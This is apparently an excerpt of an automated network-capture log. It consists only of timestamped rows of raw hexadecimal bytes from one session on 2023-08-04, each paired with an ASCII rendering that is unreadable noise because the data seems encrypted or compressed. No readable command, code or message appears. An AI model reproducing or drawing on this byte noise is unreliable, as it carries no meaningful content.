                                                                                      2023-08-04 16:48:39 UTC1498INData Raw: 06 b6 60 bc e6 c1 15 c7 f3 bb f9 1e cc 80 5f 1c c4 be 0d 47 a3 4f 56 7d 1a ad a6 75 0f 99 dd f8 1d 44 b6 1a 99 d1 b2 4b 16 f3 60 2f 0d 72 f5 73 2f c2 6b 1b 8c e8 d2 71 f3 b7 9c b3 c0 e2 a0 94 5b 18 8d d6 6c cf 53 f4 03 cc 0d f6 be ef b8 5e de 14 52 c3 af 30 00 7f ac e5 7c ef e6 fb 23 83 16 c7 34 87 59 ec a5 f6 59 d4 38 08 e1 3c 86 e1 fd 0b 97 a4 b4 49 7a 48 ec bd ac e4 9d e5 b1 11 e7 23 86 ef d7 b2 e7 07 40 cc a8 19 9c 8b e6 44 ea 68 f0 48 c2 ab 3f 49 18 f2 25 28 ac 0e cc d9 9e fc aa 98 e7 30 c5 39 5a 7a 70 84 cf 19 ec 0f cd 27 ae 88 e8 65 f8 d7 9b b5 7f 86 20 c7 54 d1 6e 4c 61 d2 d2 39 20 69 d4 a1 0e 34 ff ae 23 37 2c 6f 01 81 60 89 45 33 f0 a1 ad 83 55 f8 a7 b9 2a 6a d1 5b 40 ff 7e bf 29 63 da bb ce 90 38 90 c3 fb c5 8a 86 70 57 72 fc 72 19 78 77 ec 10
                                                                                      Data Ascii: `_GOV}uDK`/rs/kq[lS^R0|#4YY8<IzH#@DhH?I%(09Zzp'e TnLa9 i4#7,o`E3U*j[@~)c8pWrrxw
                                                                                      2023-08-04 16:48:39 UTC1502INData Raw: 25 ca 7a 0f 13 11 1a 27 ee 74 fa 67 6b d2 03 0d 82 8d af bd 2a e8 71 8e cf e9 5e 04 c9 eb b8 87 dc 83 07 13 d6 26 59 81 fa 97 9e 36 f7 38 44 b4 fe 42 63 9d b9 94 b4 bf e8 f8 77 20 6f ac 05 73 03 da ae d6 13 6d 0d ed 86 6c 99 66 98 05 2e 1b b8 4f 6f 72 16 91 e0 91 99 fc 01 c5 db 01 19 73 6c 43 b9 46 d1 17 e5 0f 34 e3 60 06 db bc 39 e7 47 b6 3b 8b ee d9 e8 66 38 ec 73 ab 68 59 2e 8f e6 f5 a9 08 0c e5 ad 91 7c 17 e8 f3 c1 be 78 50 05 5b 32 49 8b f4 31 66 6e 7a ed 78 5a 80 aa ee 20 4d 94 c6 66 e4 f1 57 ef d0 f2 c8 03 7b ff 41 48 c3 f7 88 6a 93 39 65 86 48 93 0c 70 48 06 d2 26 e1 b9 e7 4e 8f 25 07 c3 b2 db 7f 0f a6 f3 be f9 0a 9a b3 2a de 37 5b d0 f1 4b b6 80 03 fa a7 7e 44 e2 4c 8b 89 4f 9b 24 41 ef d0 bf 14 c5 84 e0 01 f5 a3 1f 4c b6 84 59 0d 75 d5 93 d3 1c
                                                                                      Data Ascii: %z'tgk*q^&Y68DBcw osmlf.OorslCF4`9G;f8shY.|xP[2I1fnzxZ MfW{AHj9eHpH&N%*7[K~DLO$ALYu
                                                                                      2023-08-04 16:48:39 UTC1506INData Raw: b8 c1 97 38 89 d2 a7 5b 2f e8 df b7 01 3a 7c a7 9a ee 14 24 96 2b 80 c4 0d a7 71 97 6e de 0a 7e 31 a5 1c 0b 5f 1f b4 e2 3f 13 35 40 ea 3b e7 02 f7 1e d7 8a b3 13 0e 3c 1f f9 4f 8f d9 f3 d6 76 31 51 7d 89 07 ba 71 ab 89 42 14 25 63 bd c1 28 7b 46 9a f3 c8 c8 ab 9d 8b ae 7b 2b cf b7 f6 3f 0b 4b a8 9b 4e df 7a 2c e5 80 16 83 5f 67 df 88 a6 69 56 a8 03 a6 09 4c e1 c5 77 33 99 cb 63 12 6a 40 17 a1 39 a6 88 64 1a af 0a 51 bc dd a7 a5 c0 27 46 ea b6 07 f5 de 2d 33 2c 14 a4 84 51 e9 e0 50 83 75 98 5b 42 20 ce 84 75 5f 96 e8 f8 a8 fa 42 4a 98 ea 81 7e 2e 5e ec 8d 5a eb 5e 22 22 24 e9 1e 1c c2 50 e4 be ea 6e 0a d4 ee 41 b3 fa d0 93 3a d7 e7 df ce cb 6b a5 40 c7 e9 16 96 e2 1f 38 56 5a 6b e4 9b 14 7b 7c cf 95 90 5f 91 73 fa fa 1d ca 9b 87 9f f3 8c d2 0f 20 c2 49 7d
                                                                                      Data Ascii: 8[/:|$+qn~1_?5@;<Ov1Q}qB%c({F{+?KNz,_giVLw3cj@9dQ'F-3,QPu[B u_BJ~.^Z^""$PnA:k@8VZk{|_s I}
                                                                                      2023-08-04 16:48:39 UTC1510INData Raw: 7e 65 68 1b c4 71 7d de f5 c0 c6 67 88 9d 19 62 00 fd 4a e3 a0 3d 2f a9 8a d8 13 11 24 dc 70 13 89 f2 c3 82 04 7b 85 7c 72 b1 e4 d3 9a e1 61 1a 57 dd b2 28 3b c6 9c d2 89 cd 02 8e f0 1a 01 b7 6d e8 1c 2d f0 b9 6d ed fd ad 82 65 c1 20 7a 78 37 b9 7b 9c e3 90 85 a5 46 a0 fa 82 a7 ec 88 3e 15 52 89 fb 3a b0 28 ee c8 d9 24 75 c7 51 37 c0 5a d4 f6 2e 1e c8 3b 56 d5 e8 b8 15 36 85 85 f1 15 ba e7 31 dd c3 1e 53 59 4d 8f c0 12 aa d6 9a 64 11 60 b5 56 43 5e b5 2b 1c 5f 0f 98 2b 90 7d 02 ca 3f 62 b5 56 43 cc 3d b9 82 5b 5f 14 1d ee 7e e4 10 59 0d 66 86 8b 4c 6b 22 d2 18 4d 79 22 20 82 ef 0e b2 b3 b7 f7 0c 53 28 39 2a b7 7e ca fd fc cc f0 40 b6 fc ef c2 7c 85 c3 a9 16 46 55 14 f9 9c 8a 1c 9d b2 9a 69 23 ee 3a 33 aa 23 89 51 c1 83 49 84 a6 10 7e 8d 93 82 e3 a7 7d 0f
                                                                                      Data Ascii: ~ehq}gbJ=/$p{|raW(;m-me zx7{F>R:($uQ7Z.;V61SYMd`VC^+_+}?bVC=[_~YfLk"My" S(9*~@|FUi#:3#QI~}
                                                                                      2023-08-04 16:48:39 UTC1514INData Raw: 43 52 6b 37 c9 aa 35 a4 8a fa 68 23 ca 53 2c 02 7c 00 88 e9 98 8d 59 ea f2 e4 87 8b 04 4b 2c b9 e0 3f f8 5f fd 4e d5 1f 3d 91 a2 36 c2 bd 9c f8 4c 73 91 4b 37 45 13 9d f9 6d 53 af d3 6c d1 19 6e 95 87 ec 56 8a fa 84 d9 5d 5b 89 6a 64 a4 4d ba 5f 5d a7 d2 db 6e 07 30 d9 a9 e8 10 e6 45 4a 4f 6d aa be 65 44 53 ca 38 4c f4 f0 4d a3 ee 67 19 0b 9b 53 bf d7 86 8a c3 97 2c c1 c4 9e dd 85 3a aa 14 be 8d aa dd 12 5d d0 be e4 e1 39 17 ce 0d ac 6f 09 ea 41 20 d2 20 d3 24 d2 16 5d c0 39 f7 8c 29 16 6a 2c 3d 56 06 4d 45 f9 1f fc 48 7e cf 8e 65 b2 5d a1 d9 db ae ad b1 d7 82 32 95 ee 1f 87 76 1d 7a e0 8d 4a ef 89 24 41 9f c0 06 04 da f0 93 b5 c6 f2 e0 95 3f e2 2f 64 f3 b4 62 07 96 31 d6 12 e2 eb 89 09 ee 7d 09 f3 ca 07 e7 ce bc ca 10 2d 0b 50 f4 54 dc bd cc bb 12 65 c2
                                                                                      Data Ascii: CRk75h#S,|YK,?_N=6LsK7EmSlnV][jdM_]n0EJOmeDS8LMgS,:]9oA $]9)j,=VMEH~e]2vzJ$A?/db1}-PTe
                                                                                      2023-08-04 16:48:39 UTC1518INData Raw: 77 80 76 bd 37 96 bf 41 32 6d 34 67 01 24 44 3e 3d a2 85 a8 8d 55 e0 35 29 09 1e 2c 2b ad 23 7d 12 e4 43 d0 b2 7b 48 e6 4f 69 2d e8 60 23 15 61 bf 10 52 5a 0a 58 2d 66 e0 0c ad 42 a2 9d 12 1a e7 fb c4 ec e5 9b 2e 89 db 67 8d 45 5b 03 98 02 b8 bd 7a 7c 62 f5 df 24 6a b9 cd 61 1a 97 fa 94 3b b6 1c 6b d8 3a 19 8d 25 49 e2 ce 61 ba 71 e4 cf ca 84 af ed 8c 09 09 78 04 71 db 56 93 09 00 c7 76 31 98 f7 a2 8c 4e 98 4b 8a 74 cd d0 93 c8 42 3e b6 7e 7b 42 0a a3 dc fb d9 44 f7 e0 f0 bc 6b 60 ef 60 b8 f3 87 f8 c1 fe b3 3a 4e aa 3c 0f 86 f1 84 48 c0 16 49 7d 82 f7 b7 a9 56 41 f1 9d 11 ba d7 7c 20 04 db 65 08 1c fb d5 13 ba 35 6b 56 ac 2f 41 76 20 82 4a b2 4e 45 f6 90 85 f6 4c 30 0a 3a 89 be 65 6c 02 12 1c 8a 59 d4 1b 65 9e 01 60 e6 9a ad c3 ae 3a 1d 46 f9 d4 2c 13 46
                                                                                      Data Ascii: wv7A2m4g$D>=U5),+#}C{HOi-`#aRZX-fB.gE[z|b$ja;k:%IaqxqVv1NKtB>~{BDk``:N<HI}VA| e5kV/Av JNEL0:elYe`:F,F
                                                                                      2023-08-04 16:48:39 UTC1522INData Raw: 10 c1 e8 bd a2 93 f7 02 55 6e d2 41 18 25 4f c8 13 cf 47 c7 5e 47 19 6a 02 f5 8e d7 44 4f ec ad c5 bb a3 32 d8 1d 23 56 c5 0c 68 54 7a 4c 01 40 9c 00 36 12 ce 86 61 ed 0c f3 6d c4 c8 06 9a b4 2a f0 c8 24 b3 01 a2 87 0b 7d 6c 5d 17 9b 4c 8e 86 0e 0d 18 ff 47 69 05 94 90 a9 10 10 2e 73 49 35 9d 97 94 ce 32 c9 92 7a 61 c0 55 d3 a0 d2 b8 1e 9b 0d 25 53 4e 6d 87 5d 73 49 29 b5 34 4f 8a c0 19 8c b0 b5 de 7b 5b a3 c3 5e 4d 69 cf bd 5c 34 9a 09 ac 42 b6 98 20 b8 2d 5e 3d 92 32 2c c9 a2 b6 a0 c7 b4 1a e3 11 09 7b 28 31 59 e4 09 f9 f3 29 40 2b 68 f2 44 86 af 34 8f 71 34 83 df 07 4f 28 5b 77 76 f9 91 10 a1 2c 54 28 32 4b 58 5a a2 d0 ab 59 43 21 2e 56 cd 1b 7a 37 19 39 a6 f5 61 ff 4d 7f fd ad 04 27 9e a3 5c f4 17 b0 b9 d4 6d a1 b8 bf 6a d2 b2 18 1c e4 70 7f 3a 78 06
                                                                                      Data Ascii: UnA%OG^GjDO2#VhTzL@6am*$}l]LGi.sI52zaU%SNm]sI)4O{[^Mi\4B -^=2,{(1Y)@+hD4q4O([wv,T(2KXZYC!.Vz79aM'\mjp:x
                                                                                      2023-08-04 16:48:39 UTC1526INData Raw: 60 bc d1 46 00 94 72 8f 2f c6 df 37 1a 39 a9 ff f3 03 96 80 c5 13 f7 e0 66 f4 8c 54 17 02 9a 42 32 0e 74 88 ad 8a 5d 88 9e b0 6f fb 49 c5 3e 64 99 36 80 4e a0 8f b1 40 f0 1b 2c d6 d7 29 23 29 a6 4d 8f 25 98 e1 bc 65 2e 56 03 37 3e 42 c1 f8 4c 17 b9 72 4a 91 1b 22 58 f6 ab 35 6f 46 8b 6c 0d 27 f9 a1 42 54 28 40 3d 28 e2 57 75 cb ff 19 bd 03 f3 91 b3 4a e8 f1 e4 1e 9d 4c 63 84 e5 c6 2b 0e 15 3b be b0 b5 95 c3 ff 66 e7 9d 44 80 f1 41 b9 ce d4 e4 89 43 17 2c 88 10 41 53 d4 ab 80 5c 38 3f 56 31 ae 9b 19 b7 37 02 06 28 fe 1f a8 03 3d 3b 1b a9 a0 65 68 c3 4e a0 c4 2d b8 d1 9b 94 a4 a1 53 89 c3 9b c3 7d 83 ec 63 e7 6d 19 66 a3 dc 64 ff c3 b0 44 62 d8 48 dc fa 59 50 59 e2 f5 40 43 ec 20 3a 44 12 39 57 27 02 00 fe 68 90 08 4a e1 e4 1c 72 e5 a3 64 91 e9 d0 b8 db 2d
                                                                                      Data Ascii: `Fr/79fTB2t]oI>d6N@,)#)M%e.V7>BLrJ"X5oFl'BT(@=(WuJLc+;fDAC,AS\8?V17(=;ehN-S}cmfdDbHYPY@C :D9W'hJrd-
                                                                                      2023-08-04 16:48:39 UTC1530INData Raw: 45 67 52 27 74 63 7b 9e fe f1 9c d1 e6 14 4f 64 f3 29 17 7e 5f af 13 f2 60 68 ac 55 fc ea 85 97 a1 f1 4a dc ca 45 0e fa a8 42 43 4d c0 db 83 04 43 f1 0d dc fd 54 90 ff 1a a5 e8 c7 c9 98 ce 35 fe 7c a7 4c 7c 58 e9 16 d9 26 f5 55 43 b9 da f8 db ee d3 b7 91 14 d5 e9 29 12 e7 0f 53 69 ce 66 57 e9 c0 9d 5f 33 4e 38 c7 5e c1 2a ea 6c f1 4d 07 40 61 63 c7 b4 7d 68 aa d0 11 b9 43 f3 7d c8 c4 9e 39 bf 70 80 8a a8 fc 6b 55 4b 9f b1 ec 53 4f bf bb 2c b9 dc 1f d7 f2 8f da c2 41 43 f4 6e cb 67 30 dc ff de 4f 86 cc 22 a2 67 52 22 8c 23 e6 e8 ca aa 4e 51 ec f5 df 00 5e 84 68 72 9f d1 47 75 6a 3d a0 4d bf 64 d6 f0 ce 95 1d 4b 05 8c ef db 05 48 eb e6 d0 c1 7a c4 fe 06 f4 09 a1 f0 60 85 79 25 4b f8 b7 e2 68 d9 2d 44 91 a7 3c ff bd dc 8e b2 57 96 51 ea 4e a0 6a d2 72 8d 86
                                                                                      Data Ascii: EgR'tc{Od)~_`hUJEBCMCT5|L|X&UC)SifW_3N8^*lM@ac}hC}9pkUKSO,ACng0O"gR"#NQ^hrGuj=MdKHz`y%Kh-D<WQNjr
                                                                                      2023-08-04 16:48:39 UTC1534INData Raw: db 28 ee ab 00 3e c0 c4 4d 3b 8a 55 a9 ac 2f 96 58 90 24 9d 31 7f 0d 73 45 42 4b 8e 7c 38 1b 60 e3 86 72 12 b9 3d 42 01 0a a7 ba e8 07 e0 d2 59 f1 53 c5 d3 b3 c8 d5 ca 3d 41 86 0e 84 1a 37 48 91 68 b9 34 48 18 54 70 fd b4 ef 97 c6 c1 74 d3 b2 bd 8c f4 04 76 50 cb 3d ed fd 1a 99 80 2f 0a 54 1c 63 77 2b b6 97 ed f2 11 c1 5e e6 bd 42 63 cc b3 e5 ba 99 bb f8 7e 09 3c 84 b3 72 31 44 ff 89 52 62 0d 66 7a 1b 32 c5 9d 2b ff e9 40 cf ae f4 11 44 ba 3a 5c 27 d0 ad 8c ab af 34 55 bc ff 03 f7 24 f6 5b 5d f5 a4 1b a0 e5 73 58 e9 83 e0 09 4f 8b c4 74 e4 82 49 94 a6 89 b6 00 bd 43 30 95 30 90 5c 2e 7f 00 f6 c4 f2 05 a7 fc 73 c9 d9 94 d9 18 c8 f8 01 ed 08 6e 1f 9b 1d 94 5b 74 9d 0d 2a 32 a6 7c 3e a6 92 5c 92 43 2d 36 73 7b 47 fb e8 27 71 00 35 10 79 7e be c6 b9 15 2d 29
                                                                                      Data Ascii: (>M;U/X$1sEBK|8`r=BYS=A7Hh4HTptvP=/Tcw+^Bc~<r1DRbfz2+@D:\'4U$[]sXOtIC00\.sn[t*2|>\C-6s{G'q5y~-)
                                                                                      2023-08-04 16:48:39 UTC1538INData Raw: 81 06 79 2f b8 19 42 0b b7 44 12 a8 53 8e d9 b8 3d 4d 58 04 03 3e 26 4a ed 67 60 60 4d e3 a6 21 0d 3f 9f 97 6d 5f 03 2b d2 b0 a6 0c 36 39 07 4e 8e eb c3 45 7d c7 3c 3f 7e 12 03 af 84 2c 82 9c 39 03 52 20 72 4c 2c ba 73 8e ff 1b 4f b6 61 42 2c 5b 6c 94 99 61 2e b3 a7 ab 15 65 5a e1 84 a6 aa e4 46 15 4c 59 eb b2 52 7b dd b1 91 cc 28 cf c9 a1 cd d0 f4 ab f7 fe 98 07 c8 94 a8 1e d2 ad 68 ea 86 6e 96 ff 1a 88 e1 dd ed 4f b2 4d 0e 1a b7 7c 7a f8 ca 09 64 13 8e 71 aa 09 7f 48 eb 65 e9 1d 13 0c fb 19 cc c5 d8 9d 75 ef 91 b7 d7 90 71 d6 1d 11 ba 9a a8 9c 2f 86 40 e0 8e 8f 95 84 dc b4 76 13 79 1a 54 b9 86 e7 08 6c 5d b4 16 6b 44 9d df 89 8c 1b cf a7 34 62 cc 3e 13 a9 ca 0e 0e d9 6b 8d 04 2b 74 b8 de 07 21 bc aa 64 22 dc 33 f2 a8 b8 59 71 a1 99 27 df 26 12 ee 3c 8b
                                                                                      Data Ascii: y/BDS=MX>&Jg``M!?m_+69NE}<?~,9R rL,sOaB,[la.eZFLYR{(hnOM|zdqHeuq/@vyTl]kD4b>k+t!d"3Yq'&<
                                                                                      2023-08-04 16:48:39 UTC1542INData Raw: 40 f8 97 4d b1 8c db 09 e0 1b 44 b6 dd dd 95 03 1e 31 1e c1 c0 8f f2 2d 4c 03 2c dc fd ce 16 64 6e a7 42 e5 d3 9d 35 cf fb a3 e6 4b 1a 9f 8b 6e f5 6b 85 bf 8e e4 27 a7 54 70 fc 30 60 fe 49 49 79 a3 74 99 12 d0 08 68 40 bc dc 1b 8b 1b 75 ee 57 ae 44 ee da 87 f1 7d 61 1b 58 d7 64 72 f1 e9 db be d0 bc 96 b2 aa 59 b5 60 9f 5d 29 13 dd e1 b2 07 5d 4a 02 48 ef b7 b7 09 95 de 72 a3 34 d9 d7 c3 7a e4 42 5f 96 b1 c4 03 2b c9 a5 75 b7 70 8b 99 0e 03 66 13 c6 f5 4c a9 b2 62 68 59 75 eb 9f f8 b4 12 c4 ce 3f a7 6d 95 c0 23 3c ad 27 7b 1e 7a 6d ba 47 ad 49 5c 51 93 25 0e c1 a0 74 40 f6 54 fb 26 54 85 ec 8d ed 95 97 1a 23 54 79 bc 1a da a1 08 0f 3a 80 07 82 21 bb 72 1d ac fc a7 ca 57 be d9 32 c7 ea 53 ad 94 ad e7 f0 aa 48 f2 4e e5 73 46 77 b2 53 66 89 c3 86 8c 69 cc 6d
                                                                                      Data Ascii: @MD1-L,dnB5Knk'Tp0`IIyth@uWD}aXdrY`])]JHr4zB_+upfLbhYu?m#<'{zmGI\Q%t@T&T#Ty:!rW2SHNsFwSfim
                                                                                      2023-08-04 16:48:39 UTC1546INData Raw: 23 f2 3f 8b 1d b1 e1 23 eb 6a bc 91 a1 dd 52 85 36 55 73 31 a1 8d 53 24 25 a1 78 a8 e1 59 96 5b 6c d5 2d ad dd b0 68 96 9a cb f9 51 36 e4 47 7f 86 d5 02 d3 f0 2c 46 5e cd 0a 4e 06 b8 42 d2 4b 12 2d 83 2f 29 8a 1e 87 3f 65 35 f0 a6 06 c8 a8 9e 94 c8 f4 94 eb a9 f3 ea 45 fa c1 14 0d cf 47 72 c2 07 67 2b 2a 20 31 b9 fc 4c 36 96 e0 73 27 d1 4d 8a c5 dd 2b 95 02 87 2a 06 7c 10 e4 c4 24 80 0a 5e b6 5e a5 c6 af cc c5 32 c9 0f 97 62 1b 4b 54 cb 7c 96 ff 9d 1c 70 83 9f 26 b2 79 34 e3 10 87 62 0a ea d7 22 fc 89 fd 21 c8 b7 cb c0 e0 b2 ef 32 c6 f4 fa 7d fd 36 4f 60 71 53 b3 5a a6 c3 45 e7 47 a8 c1 aa 51 1e af 6d ff b6 84 92 66 27 57 50 b6 fd f3 2c 3e 11 8d 2d 45 7e 25 a9 e2 ab cd 24 8c e3 60 2d f6 00 7e 76 90 c8 b3 c9 a0 c4 f9 de 34 f7 7a bf 37 79 3b de eb 18 5c e4
                                                                                      Data Ascii: #?#jR6Us1S$%xY[l-hQ6G,F^NBK-/)?e5EGrg+* 1L6s'M+*|$^^2bKT|p&y4b"!2}6O`qSZEGQmf'WP,>-E~%$`-~v4z7y;\
                                                                                      2023-08-04 16:48:39 UTC1550INData Raw: 5d 66 58 3d 0b 75 1e d7 cf f5 f8 65 85 15 00 3d 84 48 0a cf 92 dc 13 7e ad f2 56 1b fe ab 43 62 68 e2 91 e6 78 b2 35 4a b5 d5 a1 55 40 f1 55 02 c0 2a 54 9f 96 1b e7 a0 2d 55 41 d2 5d 84 86 85 9e 1b 90 d7 34 15 13 8e 56 d4 0b 2a b5 f0 4b 4f 1c cb 02 8b dd 85 a8 76 01 21 e1 f1 49 33 b1 bd b3 70 6a bb e4 82 a0 b3 3d 6c f9 68 43 93 7c 65 27 ee b0 77 b8 9e 6f 7e 17 4f c3 55 37 a1 b8 a3 ea 7f 7a 22 6d b1 ac f8 87 c1 af 18 2c 17 b9 23 3c 0e e4 19 28 15 44 ae 29 35 0b e4 ae 1f 47 f3 87 2e b9 87 45 f2 02 b6 89 51 90 c6 b5 1d 51 41 37 6e 75 c1 46 7a 24 0a be 91 84 a8 16 01 d2 e3 32 3b 21 59 eb 6f e4 f3 25 1c 4d 10 18 af 22 71 d3 58 d0 d3 9a ea e2 42 56 b7 59 1e 49 ef 9f 58 e9 e0 4e a2 7e f6 8f d8 d0 8c 18 a0 4e 6b 21 11 04 8b e8 27 1e 64 bc 40 c3 c4 f0 09 5f 96 45
                                                                                      Data Ascii: ]fX=ue=H~VCbhx5JU@U*T-UA]4V*KOv!I3pj=lhC|e'wo~OU7z"m,#<(D)5G.EQQA7nuFz$2;!Yo%M"qXBVYIXN~Nk!'d@_E
                                                                                      2023-08-04 16:48:39 UTC1554INData Raw: 73 be 7c d3 18 24 be 81 92 f7 d0 e9 77 87 9f a7 8e f4 d5 ac d9 aa bd 72 17 a5 5e 4e 9c fe 0e 3c 2f c8 21 d9 14 85 3a 60 87 a1 3e fe 35 dd 10 00 d3 83 6d 2f 8d f8 9d c2 40 ff 5d 3c e9 b9 aa 05 23 f0 45 36 99 fb bf 34 4c 39 a8 b7 12 1e ac 8f c1 20 ee 1c f1 30 a1 ee 54 f8 1b ab 3f 00 a9 0d f1 d5 92 7c 1a 85 bb 6b b4 36 2f 61 d2 a4 3e 40 33 d3 37 ec 9d 47 1d d7 ce ca cc c4 00 f8 e2 a6 87 70 8a e0 f8 89 4c 3c fd 97 04 51 4c 03 47 36 61 65 8e e0 d1 dd a8 a4 4b 93 d5 e7 4b 1f 92 33 8b 7c 68 4e 67 65 ba be 8d 5a 89 63 53 12 8e 8d c9 9e 1c d8 58 6f d6 99 43 43 80 2e 6a a3 1c e3 62 0b 53 62 e0 bf f6 30 a1 19 13 72 ef b1 67 0b df 59 4e 53 79 c6 1e eb f9 55 81 bc c6 ea 50 ba b4 d4 ac bc d2 1b 6d 5c 44 a8 22 d0 40 21 6d fd 34 c4 c8 2c a0 e7 f8 5c 1b 0e 2d a9 5a e6 7d
                                                                                      Data Ascii: s|$wr^N</!:`>5m/@]<#E64L9 0T?|k6/a>@37GpL<QLG6aeKK3|hNgeZcSXoCC.jbSb0rgYNSyUPm\D"@!m4,\-Z}
                                                                                      2023-08-04 16:48:39 UTC1558INData Raw: 32 fb e2 9f ff 8c c1 b1 bb c1 a7 4b c0 c8 23 89 3c 06 e9 89 fe cf 36 1c 88 84 fd ef e6 95 b7 f7 11 07 58 85 2f 21 7d a8 eb 1b 7b 2b 5e b0 c1 bf c2 ff 8f 5c f6 4a 5b 8b 29 7d 4a d9 56 60 ea 06 98 85 ed cc 3a 57 f0 9f 0f 7d f1 3f fe 43 85 ea 43 7f 27 ed a9 6e 85 ed 14 05 4f 3d df e4 5c bf ee 5b 67 26 4f 39 90 69 15 5c 80 ec 4b f6 ec a2 9e 9b 0d fc 6f c9 21 5b 87 ef f3 b5 0a 82 f5 ad a2 83 33 72 94 a6 33 19 4d a0 1a e8 26 a6 37 72 08 3e 24 b0 ee bc c2 b7 25 1d 87 74 84 35 e0 5d 67 a8 d1 bb b9 c5 55 d8 65 59 38 ef ad b5 1a 4f 3a 18 64 d8 c2 74 a3 03 72 91 a3 6f cf c9 9d af e7 c0 dc 29 0a b6 22 b0 ad 45 79 11 32 6a 1c af 57 75 54 13 5a c2 49 bc e5 73 82 7b b0 7e 60 e7 38 01 60 7f 6a 8d 51 60 3c 28 bf 9a 3d 44 f1 d8 13 13 58 c3 0c ea bb 01 f7 91 d0 e9 a7 f4 ac
                                                                                      Data Ascii: 2K#<6X/!}{+^\J[)}JV`:W}?CC'nO=\[g&O9i\Ko![3r3M&7r>$%t5]gUeY8O:dtro)"Ey2jWuTZIs{~`8`jQ`<(=DX
                                                                                      2023-08-04 16:48:39 UTC1562INData Raw: 29 77 0e e8 01 68 8a 4f e1 db cb 25 9e a0 14 fb 6f 58 59 bf 4c 48 13 5a c4 77 63 6d 5a da e8 4f 72 fb 15 a4 bc 4a 44 4c 94 ef aa cb 22 45 b0 6a 4d 1b e5 e8 c0 81 c0 20 91 25 8c 77 a6 67 d6 39 74 f1 c5 5a 8e 2a 73 d1 99 3c f7 2f 81 d7 40 77 fc 0e b7 f8 f9 16 30 fc 97 25 29 35 c7 2d cb 0f 4c c8 ca fd 90 6a 85 87 c3 31 87 3b 80 de fd bb 12 5a 3a b5 c7 3f 20 de 26 33 0f e2 8b 8b 83 5d f0 01 c1 6d fc a3 c7 ec 77 7b 02 81 39 a1 ae da 87 de 25 05 6d 59 fd ab 6a 6b 87 80 57 03 fa 37 cd 19 44 f1 42 4b 21 42 cc 0f 4e ae 28 8f 6c fa 02 23 c5 d4 53 dc cf e8 8d 9e 96 08 63 5e ad 80 48 51 67 2e c9 33 92 cd 6e 98 f9 82 6e d2 55 99 cb dc 39 4d 58 7f 25 10 22 e9 4d e3 a9 94 f2 af 93 b6 a4 24 c5 8d 8c 29 63 8b 10 6d ca 67 35 1b 28 75 d1 8d c0 61 42 07 45 ee b8 34 c6 0c 50
                                                                                      Data Ascii: )whO%oXYLHZwcmZOrJDL"EjM %wg9tZ*s</@w0%)5-Lj1;Z:? &3]mw{9%mYjkW7DBK!BN(l#Sc^HQg.3nnU9MX%"M$)cmg5(uaBE4P
                                                                                      2023-08-04 16:48:39 UTC1566INData Raw: 4a ad 0a 23 62 9d 4c 2c ec 32 16 70 18 b2 fc 52 e3 90 46 ff 9a c1 43 40 92 e3 ca b9 b6 0d 97 63 1e 04 d2 38 3b ee 4b e5 f5 36 95 1a e3 70 d1 95 38 95 c4 4b ed 6f 16 1a df d4 7c e0 ff 03 9a cf cb c5 b7 8f 26 4f 0d e8 e8 34 68 4c 3d 53 e9 c9 7b 4b 5a dc d8 47 43 44 5b 81 08 cf 4d 02 f6 4f 96 a6 0f 70 8d 8c a8 47 57 fe 9b 78 97 ad 91 f5 c5 c6 b7 f1 da 83 03 33 e8 bb 6a 20 fe e1 d7 8e 82 b4 f1 af be d3 f9 08 b9 d9 85 b3 12 bb ae 06 ad d9 bb 21 c3 a4 53 46 bd e3 19 2f c9 9d 65 4a e0 af 8e 3a 8c 62 0d 7e ec dd 39 2f ab f1 72 24 86 67 df 86 4b a1 27 dc f0 15 8c 5a 2a a3 12 b6 05 d1 f2 c0 23 c3 ee 23 80 78 b4 40 0e e5 4d a2 fb 7a 69 99 c8 c2 96 53 4d a0 10 f5 c5 17 58 52 71 37 4c 21 f1 ff 40 b5 e5 11 d6 66 cd 6d d4 fd 50 0b 61 8a 67 4a 1e 23 5c 53 77 1a 6a 68 8e
                                                                                      Data Ascii: J#bL,2pRFC@c8;K6p8Ko|&O4hL=S{KZGCD[MOpGWx3j !SF/eJ:b~9/r$gK'Z*##x@MziSMXRq7L!@fmPagJ#\Swjh
                                                                                      2023-08-04 16:48:39 UTC1570INData Raw: d0 14 32 42 06 9e 3d 2b 06 ca fe fc 76 1a f0 c3 ea 3a 63 65 ca e7 fe 5d ae 74 a5 f2 7d 19 b5 be 10 90 fd e5 5d 5b 5b 5a a3 0e c7 a3 a5 75 bc 08 83 9e a5 4d ff 8b a4 ce 11 96 51 2b 55 cb d5 5e a9 ed 60 15 55 2b b4 c2 b5 fe 38 ca 36 3e 4c e8 00 4d 43 3a 75 93 1a 6d b8 6a 9c 9f e0 94 56 32 e5 fb c9 c8 38 6f 08 fd a2 e5 64 ad 8c 77 35 24 97 d2 24 96 11 16 38 2e 2b 49 ec 08 4e d5 6f 32 cd 41 03 d2 6e 58 cf b4 31 77 d8 47 b1 42 34 04 b3 15 be 5f cf e5 e8 ab a6 7b 08 38 e5 95 ea 6f 02 8d d5 21 ce 1b b0 3a 44 12 5a 5b bb d6 01 68 62 3b 46 8b 55 46 1e bb 23 8e be ab 4f 4f 44 42 87 aa 60 93 a9 b9 e2 98 cc 2e 28 06 91 03 9d eb e3 16 f6 18 8d 31 c7 4c eb 36 78 13 2a 25 21 27 10 4f 31 10 87 73 69 66 c5 5e 47 8c b2 05 d3 70 3f 49 22 d3 2e be f2 4c e3 25 d0 e1 37 89 fc
                                                                                      Data Ascii: 2B=+v:ce]t}][[ZuMQ+U^`U+86>LMC:umjV28odw5$$8.+INo2AnX1wGB4_{8o!:DZ[hb;FUF#OODB`.(1L6x*%!'O1sif^Gp?I".L%7
                                                                                      2023-08-04 16:48:39 UTC1574INData Raw: 47 0f b5 c1 64 22 7f dc ce e2 99 a9 0c 1f 32 89 d7 ef 4b 12 3c 09 55 df 9e f4 13 2d 6d c0 dd f1 a7 88 c4 67 55 c0 ee db 86 b3 92 1a 61 3c 9d 17 57 77 27 36 9d b9 89 c0 7b cd 97 17 85 f6 13 8d a5 3b b0 e1 7a 25 f8 e5 65 43 ab 27 63 ec e4 b3 38 81 a1 69 de 97 bd 0f 7c 92 72 a4 49 73 3a 05 d4 7e 65 04 c4 a0 7d 15 f0 0d d2 ad c0 a7 ca a9 ac fe 93 48 1e b6 ed fb 4f 5a ba 8b 2e a4 39 4c a7 68 2b fa 57 50 a9 14 76 6c 1c ac b4 dc 5e 73 d7 e2 1d 02 3d b2 f5 41 7c 2a 3d 13 8b fd 65 28 bf c3 d4 8c 31 14 ce ec a6 ae 83 fe 1f 18 fb f6 94 53 81 0a 8b a8 84 68 98 74 c7 